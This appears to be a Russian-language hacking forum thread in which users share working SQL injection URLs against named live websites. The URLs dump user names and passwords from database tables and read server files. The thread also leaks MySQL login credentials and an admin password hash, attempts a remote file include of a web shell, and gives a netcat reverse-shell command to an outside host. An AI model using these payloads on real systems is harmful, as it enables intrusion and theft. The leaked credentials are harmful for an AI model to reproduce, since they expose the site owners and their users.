Code: http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?
ограничение длины запроса. Вывод - никак по данной ссылке, даже при таком варианте: Code: http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4.html вернее можно, элементарно, но так: Code: http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+and+substring(version(),1,1)=5.html т.е. как бы вслепую
Чисто таблички user нету, PHP: http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat(table_schema,0x2E,table_name)+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.TABLES+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)+and+table_name+LIKE+0x257573657225.html karabas_svalka2.t_users karabas_svalka2.t_users_activate karabas_svalka2.t_users(в t_users_activate такие же колумны): PHP: http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(COLUMN_NAME+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='t_users'.html id email passwd user_type creation_date comment name phone icq id_city id_country bday bmonth byear sex id_prefix ну не вижу в чем проблема вытаскивай например вот так с них: PHP: http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat_ws(0x3A,name,passwd)+separator+'%3Cbr%3E'),25,26,27,28,29,30,31,32,33,34+from+karabas_svalka2.t_users.html 2Byrger Читалка файлов(как мило с их стороны ) PHP: http://www.rustrana.ru/article.php?nid=3486853333+union+select+concat('/var/www/site3/public_html/connect.php',0x00),2,3,4,5,@@version,7,8,9,10,11,12,13,14,15--+ Реквизиты конекта MySQL: USER:dbu_ansimov_1 PASS:BFzHAHAMz1K Ну и сам phpMyAdmin - http://www.rustrana.ru/phpadm/
чтобы зайти в эти директории нужно быть в той же группе что и тот комп к примеру: MSHOME и у тебя название и пароль учётки должен быть такой же как у того админа...
Code: http://wow.homeline.kg/test/?apage=guilds&guid=102+and+substring(version(),1,1)=5 5-я ветка. Code: http://wow.homeline.kg/test/?apage=guilds&guid=102+union+select+1 1 колонка без вывода. Code: http://wow.homeline.kg/test/?apage=guilds&guid=102+and+ascii(substring((SELECT+file_priv+from+mysql.user+limit+0,1),1,1))=89 file_priv=Y. Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)
Просто не нужно торопиться http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,concat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+ http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,LOAD_FILE(0x633A2F626F6F742E696E69),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+ И ещё момент, file_priv так не проверяется. Тоесть в данном случае это прокатило, но ты же не знал, что база под рутом. Ты проверил его у первой записи в таблице, а это всегда (почти) рут. А нужно проверять у текущего юзера
Поимел шелл на серваке, сплоит под это ядро имеется, gcc есть, но не могу забиндить порт (фаер блочит видимо), тупо виснет.Скомпилить через шелл так же не вышло.Бэк коннект средствами шелла пишет "Now script try connect to ИП port ПОРТ", но netcat молчит =( Возможно сижу за натом. Кто может помочь? В пм плиз. З.Ы. Порты разные пробовал, shell - r57 ________________________________ added Ещё вопросец. Вытянул из джумлы админский пасс в хеше Такого вида (id,username,password) 62::admin::b3b05184a80b4915a7ea49f1b06cefcb:Z1RKNCslakgoAAuq55wasFVX8zGRYkIa Солёный? Или?
Решил вспомнить молодость зашел на Майл.ру чат - и нефига чото у меня неотображает сообщения то чо тако ??
фаер скорей всего и блочит. попробуй забиндить под бэккэнект уже открытый порт. или я туплю, и нечего не выйдет?)) скорей всего ничего и не выйдет, ели фаер умный)
Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell и вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php Выводится пустая страница. В чем моя ошибка?
z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla вылазиет ошибка, значит он возможен? или нет?
Как это-забиндить под бэкконнект? Если я смогу забиндить-то нах мне бэкконнект? Просто мне нужно узнать, как например поставить бэкконнект не на мой ип, а на левую тачку, к которой у меня есть доступ (скажем так), или подобный вариант, т.к. я сижу за натом, как оказалось.
биндишь порт - не факт что приконектишься для бекконекта неткатом nc -v www.adres_deda.com -e /bin/sh & на деде nc -l -p помоему так